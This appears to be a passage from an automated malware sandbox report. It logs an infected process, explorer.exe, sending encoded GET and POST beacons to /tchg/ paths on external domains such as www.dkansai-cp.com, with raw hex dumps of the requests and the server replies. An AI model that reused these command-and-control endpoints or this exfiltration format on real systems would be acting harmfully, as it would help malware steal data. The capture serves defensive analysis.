6a 76 61 79 65 7a 5f 4a 6a 38 36 50 53 75 69 7e 76 66 51 6a 75 4a 71 6b 70 61 52 35 75 70 63 35 50 45 69 71 35 6c 66 57 30 66 2d 4b 4f 61 73 5a 6b 74 69 70 34 58 51 39 41 49 44 50 73 39 32 6a 69 41 79 4e 54 47 59 61 71 59 55 58 55 69 54 65 57 6d 4b 78 6a 67 61 31 4d 36 53 39 33 50 36 6a 38 70 6e 28 75 6a 72 28 4e 44 31 6f 30 7e 66 78 70 63 53 55 31 44 7a 46 5f 4d 38 54 55 75 61 74 6b 4c 43 4d 64 74 4f 32 33 51 4b 36 76 57 72 38 4d 39 71 50 32 42 30 70 55 6b 67 37 54 68 75 7e 72 76 44 4e 35 28 48 7e 48 47 76 6f 6a 35 49 44 4e 31 36 54 58 28 4f 79 76 35 37 33 56 36 6e 74 6b 4a 55 7e 67 6a 44 4b 65 76 75 49 50 63 68 30 74 33 6e 74 31 46 4a 37 77 30 67 34 63 38 5a 4a 46 68 74 35 75 76 65 79 34 57 72 6c
                                                                                                                    Data Ascii: O0qEM=cWIuLz26coaUCpm6uffCFshODdrE0vGSsPTGM0fCMT1hSmIHUJq14JLAyJ~bpRT526NzrFdPZY5QW9ocfrq5cK630zBMhVb9n1P_SKoYWSxCEhrLSv5R~nuTt2EEXGN722mMoIljozvV0Te7VR3TWjFOHq(Uc7iVN05cctSR9xbdwd(QgDnAQ2LbC5j-1QnwljPoWcHjtIO5mIUSD1GXWkGvk-j-w8kGRSpGO6I8oMhnWMoc5EPVwXR73SIvYmHpROEEXNlXs_slj-WPoLLd~_hYYAyWIhVLm18xI-FSNFOnw-Jz1SImrJhLkmzX9oPqhszOe68w7yXEv6gn3h94j6Z5xpHNfiiVHQGEOw0L~g40fAOkcEFntRh05853nM0scQO-wKBRncCb0GBKk1l7oXgcA9Lx~NAdBuo54IhMRiAIuXE9sTKn3wicM1KyQO6eRzVE~D(16MOCufzDiOMYwN8efARKwmsBNruKINTkAQL965exH5cHoCAMRMT6F4iylo47TjPxwWgLeHxHllN1F6rgvkZnxoGnWBoBOJ~V6ZwPQWOX~00i7JXKnnkSES7-zvqNwmD0EVQvMlC_BMqj9ly1HeTDOyC3twgIjfxx6X1X49gQAJp9nYzwTvrYbrytg3pl9bAK~0HE6wJQa_GFCgH6qZJ0kWAH9jeqzATfQ87SBdjYXssshtXxlD9UbKkNVLSBKwEouwlBm9fzBPin1y1_WjB8m-EEk6l9hPAvaVOJajiORrGoG_V9bGPFMA(26Z(AyqPtIRSHQDDFb9yOKiS8mGa3kmIO7DtRniV_5n47gqpxsqHcTy658m2lgoz_J36IA_j-nDy9O3TQY_Rq6CbmPoAqwHKKKGEoQTWo3Vhq~qTIyLksVchE3ysZpocCdfUwimJfzTW1Nkamzw939AIkrh~mSaFdgPZGCraSBY0dlx4ysdqTZawP~cN4fEqtQylcoYLEM8e1EhORiOWzzxcXHyg0Hffj8jezS1QMDaYG~heQrk26sOLMMzyIlp5rVJntHS2N~Ee4pChdmde2DlEp0JFPrpPfNej5fGZKyWa4opWs~bCX6rKcRIihKV1eBcKWshryxPlTYEIn(QauOrw9LSySEJMv4jvayez_Jj86PSui~vfQjuJqkpaR5upc5PEiq5lfW0f-KOasZktip4XQ9AIDPs92jiAyNTGYaqYUXUiTeWmKxjga1M6S93P6j8pn(ujr(ND1o0~fxpcSU1DzF_M8TUuatkLCMdtO23QK6vWr8M9qP2B0pUkg7Thu~rvDN5(H~HGvoj5IDN16TX(Oyv573V6ntkJU~gjDKevuIPch0t3nt1FJ7w0g4c8ZJFht5uvey4Wrly7jRQaDyCFqOo684QolWQzDWtdViRjhSPrNkbKqs9JfYzKSAPk-fWS6WhdxUw6Nsip-cjjBaCTaAFCvlaF50a(Skb(5nz0sgJAOANnAHOfmLk7dETrJGSrCEYyW1bVMp03pw2638u(TeApm6KQ5wRHTk2gUNwuYK25bE2IUS1rz~6DlZlL_jvr-(zU9KWBM3sfkChsEbCxEG7ThB8wGtd7OIzVe6vN3lnqI8ZBbPoX6Oa9H2tP6oXqbbLwXDr4OliJM9dndgzgoK0zNEzV_AVqk2S4N7vi5GILOE9ipLTwzxsULfxhxyIqjdYLsMko9amZGxu09NDQR2QGsF0ojrE7Hi9n5JDIl(B~GrITagro_TzyDfKpSWBdwXAtzkPt7QyOmgi5yGx13xnQUT-goE8cZMV6nu2ZdlHzaT34cQSF8SZZJ8pPt(_e8IyXhmkUUt_7P6BlF2d6hSEk3Ruhxm6t0VClNm-ytqQrKS946LNCGjIPdHtmw~aR-R4OxjTgRCDejLJn8qlBb(P2RjuPwXZk_MUREiU4GGTw4g5(HEqlbo5N8t_eMqUvMM7YBfv25IJdQzdeggIRb3glCA9a8uVN_MEzA(dJhU63j~BGSkosLloJ6GX~zIJnjHB7PMTQy9S7qMLbnVpJPb7y9D8jOYBNku73SFmGkXeqYiGRD8VvEt4~02DR_eF28i4CuuFzuGz~bMYID8-6_cZDoWQ0IghDY0MCiDMs2u3gIfWSDQu3r3E3HYvUw9VMunBS23hGaYvOuSWW1PAdKbxcX7vqAj5jao5WiN7qe3sSpuSdfDFkmL0AQCCvdGOWwiCf0TUTGPLQcv6xGE8wUca5k8xgrlco-Q-ttUcBJgiJ03Z(_qJ(_gLLwxUB0WRJ4zwg4uK6dZUVEhDSjPrhI(GI_TFW8hR0ga3MgR9gPGJr4zlzwC9ESDITBzbEYfP3JMU13k50mOFpN09~vIpIsEQE7ORBNe9JsrJLsaWn-dKrMYgaF2UwDk3vhcVi3X0NsJy23daoK7dEBBlF6C7YLI05Kv0CsfD2byuWSxeNQj-qJF6cAkd1IdjyDIV7x651mMXI92_AEeGa8zHFgIm(MD25niR9V2lTnUj(O67SCKIza2U9N4sv0BMj7N2jSDyBXpRLfWBNpJlLG7RjJbzAiBMSd2wF40Psr3nfGJWRHd1oWjYbZxBeOt1Hu35pcXgy3AI4gM-vKb0seEHTCHiBka0YsT6VQbW6SNvdM9vxnBj27zm~D2WJGxJY-PdV2CFK-RajPoRoou7Pe7uf08eR_KukB1Qj_~S8PjC~o7Smc3R1XdXoy2_9HmVX_auIh0UpnovF14rU0(HaR8_hX553er7sSn5DckbntIrc50p1yU9FGw-mYkGG8d0QZfbYQIGqqSauZ7G1jtooBLLL4dgyLJYxKLrOu4aeKn-Qc6081NZqlsLlHt6VRg46A2_JpETW60qgRznBzXEcuz6O6a7ZwIWUVGtTZDy8LPBdHXbvsh9ubjFB4I4rkyMnByQtQSgL4ILpI0VZh~kVPObKNs_4rTQnBY-fOQafkn4X9DJOvuIJJYxFMjDKDGH~oo28mjvYH~8UhMonc~9QttGrjuSnIecy4PIodSFv3mtE_kh0YCVJIwlWCHt2NEwDnGg11F6Ol5w5bl2AkgrANUCyB5np6zPhDWaa5NXuK14zgJO03aPVVal4J(LabGwv-W2V98PphdR9wRDxyg4SaS7SC7Rg7cgpvlV4L87tSgqfDfttULfOrjXVBzZaMj-903VaZ75Q4j0(jxbCOpIC_9a62nq9dERrTz3QXUuGgicNDMFJeWywnYViSduuHaqmvnDr80DhWyQD6ZgzvMQjyBiso9FWSNcI6AVc5e7S9VpfyKA~TXmKEJ3F57Mn2QwYFt1GTcCxkdfB4qkGmiEqVWlmM54dMC5mEuQavEDerAZpHhKVl(G5tQm9dSytk77fMeHdfFP96DvhyWsnHBAqjwL6i(32qODWHrpugVGBzSAn3KrRPi4TRGoA2(AVcQnULdduG91hUXxoebuwWZOQzUtIE(D0bXDDcrIuP7xcw9eh_62alDXDxedip92UurSKqZgI-A4xV7kGtdwpA2TH_MOhcUcf_0yJMNubIRSJj5FcinQgxI9sA8-4ATo5koy8KTVQpu_C7bIJlP9MWW3WIs6NBCDMVfFgq~mHf8qjMUzi-5NR8zDGk5c0DZy(aqNw2usQeIVg76YCUG6ouiGc_YUPBJ0~kAutQtGbQsA92LSk0CXZicQh1JnvzhtWKAIGXESznYH1otQ6QnI4oyAf7H_CdiF6GM0ec0K9o2EzDpadpDBjSn7Aw~3HHrvZ388Lsoi7DtYIVP-c4ZmSixv7DEqPPIpYEAB3QS-IhKF6j7BkBs7(3SmF7oBC-OURSUY2GmvnNluM-Tb1XayQhFdpevjW5F9nurbrLEwi_VTRB11rJfqNACWELzzUfxqHA9Zi53-ojKTEyUUviZ82AGkRfA6ktItfzp6kiTs91f72wWUx79ffncg(DktoRomZiDzvWgpz7a2vRdnB2iQqAZ5sSvrGtPVSTQaDt3EHM5Sc2YMNWnQfGhHyGlGBxCmNeKIpLMLf2~1Mgo1mWRt2HyI69YFeT6o0LxCqOpfz9RwHYcicUIeIbGaOljC3dd-8kgNA0Sv29ZdH4zzLoIL710DGyzdaJLCl5SxwB2BxRg4E50Eh0qubRjhhc
                                                                                                                    May 30, 2023 11:09:20.693150043 CEST666OUTData Raw: 4a 65 50 6d 72 7a 49 57 35 32 34 4e 4f 78 78 79 58 78 5a 55 46 48 77 50 48 37 68 6f 6b 39 7e 57 62 2d 6e 41 42 50 71 41 66 41 78 43 68 76 70 69 47 74 42 5a 75 70 50 69 65 4c 55 30 54 7a 51 66 5a 52 6d 56 65 49 38 66 48 71 68 70 57 36 65 51 4c 31
                                                                                                                    Data Ascii: JePmrzIW524NOxxyXxZUFHwPH7hok9~Wb-nABPqAfAxChvpiGtBZupPieLU0TzQfZRmVeI8fHqhpW6eQL15fhxQFq-MLrDEKh_iQWP8HPiq0PIQ-6ukwYcaLzXmfcMMh2Q(gZfzhYjDsfZi-7ovUolSKHD(TUKgRnFuwtU809ivSETWWg-y5tK7Q(xqj71(ZTISw67Min0dVxuSDPlqyxl8c(MSt1XzyDKAbQZvyvL~BDCSWikD
                                                                                                                    May 30, 2023 11:09:20.693258047 CEST671OUTData Raw: 51 34 53 67 51 56 79 4d 4d 49 61 7a 6b 53 6c 39 72 4e 63 44 47 67 72 58 31 47 28 4f 74 33 39 43 4a 4f 6d 68 55 5a 44 6e 4d 45 64 65 67 6f 6b 68 77 76 43 41 34 7a 72 76 67 5f 70 6b 7a 50 35 71 7e 4e 43 32 33 5a 44 30 7a 6f 52 58 69 6d 78 50 62 50
                                                                                                                    Data Ascii: Q4SgQVyMMIazkSl9rNcDGgrX1G(Ot39CJOmhUZDnMEdegokhwvCA4zrvg_pkzP5q~NC23ZD0zoRXimxPbPFEe0jFfXuTJFYTyJVXKeiiDI7jiuB8Qjp4XlmkukR765xIPjVcnTRlGWkRLunB8Cy900K4jLRfmrCQtSpi2Y1c0U7usYRH~RWhaRGYqjUz~zYVvSL3amAEQKBY5GDfqqJpWDX0U4zyWEDF6NI1Ky1oo7qu1sctULP
                                                                                                                    May 30, 2023 11:09:20.693315029 CEST673OUTData Raw: 43 6b 6f 31 4e 74 76 37 4e 44 51 42 66 62 37 64 78 62 56 54 31 6a 39 59 49 78 54 36 54 4c 38 72 4e 4e 4c 30 69 65 69 52 4c 7a 77 6f 7a 71 41 61 54 6a 30 68 4e 74 5a 32 30 33 38 77 74 59 57 2d 76 56 43 31 49 67 50 4b 6d 30 64 43 71 58 42 7a 77 7a
                                                                                                                    Data Ascii: Cko1Ntv7NDQBfb7dxbVT1j9YIxT6TL8rNNL0ieiRLzwozqAaTj0hNtZ2038wtYW-vVC1IgPKm0dCqXBzwzl8W2zKx87rZ5WGLQKw(CeEnWIDUXVRRAPdfcDf5J2o5OBSYD6TDMmJGxOh1QPo5UYwpAhaHaFZWeXqa8cCPPvtY4a9AHOka01o~iwStZF9WeR0EumS2_6iN5kk96RCNzQk39E2CbCm27gUlw9luMZi8fpaGsilzJo
                                                                                                                    May 30, 2023 11:09:20.693751097 CEST679OUTData Raw: 68 6e 55 71 28 62 67 61 39 75 52 35 55 50 6d 52 79 5a 79 64 5a 43 79 44 4e 55 31 49 6a 4e 69 73 4b 57 57 30 39 31 7a 7a 72 5a 64 36 31 75 45 6f 31 49 6e 53 67 31 5a 50 4f 69 4b 58 38 5a 56 2d 76 38 58 51 73 55 43 34 6a 53 61 4f 51 45 32 61 4b 42
                                                                                                                    Data Ascii: hnUq(bga9uR5UPmRyZydZCyDNU1IjNisKWW091zzrZd61uEo1InSg1ZPOiKX8ZV-v8XQsUC4jSaOQE2aKBZmHM9BHvj7TJ7PGT9HI7rtezVkbL7IpG7Ip6S4QZITi16GOT2iFs(7bcXb6X12QEd-cin2urXms-x1baROE4DMFHyqAUqD91dTKyoCSDeLKu99jtoiWyUSSO5eYhpLygQdq5yR1IIPalLJ7ggSvYGrFNI8SRnGWQK
                                                                                                                    May 30, 2023 11:09:20.693877935 CEST689OUTData Raw: 34 31 33 38 52 62 43 2d 50 51 5a 77 61 4c 48 6f 52 73 7e 53 43 59 39 32 71 5f 37 4e 76 64 77 62 55 6c 5a 5f 79 58 4e 4e 76 36 63 54 4b 2d 46 79 7e 41 6a 75 76 37 74 62 55 66 30 65 46 7a 4a 70 71 32 4c 76 4e 65 56 6c 36 4a 4f 6e 53 6d 49 6e 44 6d
                                                                                                                    Data Ascii: 4138RbC-PQZwaLHoRs~SCY92q_7NvdwbUlZ_yXNNv6cTK-Fy~Ajuv7tbUf0eFzJpq2LvNeVl6JOnSmInDmXC~lzpPkoUkNNiomoJbxwFvqpLJ8busiIG4XTFRzjurQHsYBVAgrtpFSH6rvCUAuHkr_xhBNFgMBCrQP0lMgH0MBmr1CI8OOVQwTQvlIFm34onRGMMCnTGfTq-CPbsz-Hz8FQjKGUm~ErbofijpNCq8jjIxoq1(IE
                                                                                                                    May 30, 2023 11:09:20.851471901 CEST695OUTData Raw: 31 71 36 6a 69 66 58 5a 31 56 7a 6e 39 5f 59 4f 33 71 6d 4f 42 78 61 54 43 4c 50 2d 50 65 6b 49 4e 54 42 32 37 44 6b 31 65 66 4e 6e 46 70 5a 66 76 51 75 68 51 43 6f 39 65 32 78 5f 4b 66 39 78 7a 72 51 56 54 77 4d 4d 79 38 74 53 32 64 4a 4c 6f 41
                                                                                                                    Data Ascii: 1q6jifXZ1Vzn9_YO3qmOBxaTCLP-PekINTB27Dk1efNnFpZfvQuhQCo9e2x_Kf9xzrQVTwMMy8tS2dJLoA5PtXGZ85ZVVs(gLupVJKL3PxZm~wnxgbJSOP4T9nDtDoYcvC9edxRvcMIh30b1J1JhGYvnvAlx(DLLcjI715e92rKe~0lPf6rGnYfA1TLPnf2RLvOJBGeWrlc1UC6o6o1Bkac4B7zBFREI1DCX3xKBR3o9yDlp1lr
                                                                                                                    May 30, 2023 11:09:20.851588011 CEST703OUTData Raw: 6a 6c 43 6a 4f 36 51 71 31 4d 64 4d 39 6b 77 30 66 62 4a 70 4a 54 73 54 54 45 4b 43 30 53 6b 32 53 41 6f 4b 52 68 6e 42 79 32 59 72 37 67 61 41 48 33 37 6f 63 59 39 6f 62 65 37 58 59 4e 58 68 63 53 36 5a 4a 50 53 31 44 4e 6f 6f 74 50 37 79 73 4b
                                                                                                                    Data Ascii: jlCjO6Qq1MdM9kw0fbJpJTsTTEKC0Sk2SAoKRhnBy2Yr7gaAH37ocY9obe7XYNXhcS6ZJPS1DNootP7ysKWFkXQYkZduDOVih-AjASKdaDFDtk2_m8hBRhM-~tKf022VRhv0bCW0WvUxprUH44yurp8Aqzh6ykNSvy2MaRF3m4elzSvsQaIm1yKPIbaDk_ep2xcBYY4eSsO2fYLrBUiVsgsLeGR1ZOC_cqbbfvUhK_oKttHV1vL
                                                                                                                    May 30, 2023 11:09:21.545290947 CEST704INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 30 May 2023 09:09:20 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Content-Length: 320
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 75 73 72 5f 69 64 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 69 73 70 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 64 74 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                                                                                    Data Ascii: <br /><b>Notice</b>: Undefined variable: usr_id in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: isp in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: dt in <b>/var/www/html/newred.php</b> on line <b>51</b><br />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    26192.168.11.2049785216.108.231.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:23.220489025 CEST704OUTGET /tchg/?O0qEM=RUgOIEC2bpKEAb3gt63mE+Z8A/D48vS2kv7pSD36MjRmJGY6VLK565PH5Ya2jxSU9dFBv1ZYes9vP/U9IpvgXfidz0YLsWTogQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.fairbitawayposearisk.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:09:23.908571959 CEST705INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 30 May 2023 09:09:23 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Content-Length: 320
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 75 73 72 5f 69 64 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 69 73 70 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 64 74 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                                                                                    Data Ascii: <br /><b>Notice</b>: Undefined variable: usr_id in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: isp in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: dt in <b>/var/www/html/newred.php</b> on line <b>51</b><br />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    27192.168.11.2049786183.90.238.4380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:29.715589046 CEST706OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.dkansai-cp.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.dkansai-cp.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.dkansai-cp.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 6c 54 47 5f 69 5a 51 31 65 38 72 54 52 36 43 43 76 48 53 6f 59 49 68 6a 76 32 36 45 68 76 33 63 4f 71 4c 75 41 48 52 39 75 69 54 46 4b 38 31 33 77 69 32 6d 71 76 32 45 70 57 70 72 77 5f 42 52 28 53 69 36 6a 38 75 78 7a 50 71 73 65 55 4f 7a 52 46 41 2d 43 39 6e 63 62 4e 49 5a 4f 67 65 45 69 59 49 79 41 52 72 41 74 4f 36 68 31 74 32 4f 7e 6a 45 5f 75 55 7e 58 4e 41 69 5a 33 56 37 32 6d 4c 72 6c 28 45 42 77 33 4c 36 51 68 79 75 34 4d 72 70 64 44 61 4a 76 45 4f 42 76 79 6a 77 66 4e 65 73 76 69 4d 7e 4a 4a 44 77 6d 68 62 78 74 42 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=lTG_iZQ1e8rTR6CCvHSoYIhjv26Ehv3cOqLuAHR9uiTFK813wi2mqv2EpWprw_BR(Si6j8uxzPqseUOzRFA-C9ncbNIZOgeEiYIyARrAtO6h1t2O~jE_uU~XNAiZ3V72mLrl(EBw3L6Qhyu4MrpdDaJvEOBvyjwfNesviM~JJDwmhbxtBg).
                                                                                                                    May 30, 2023 11:09:29.982260942 CEST707INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:09:28 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Last-Modified: Mon, 02 Jul 2018 00:27:42 GMT
                                                                                                                    ETag: W/"afe-56ff9440f72fb"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                                                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                                                                                    May 30, 2023 11:09:29.982342005 CEST708INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
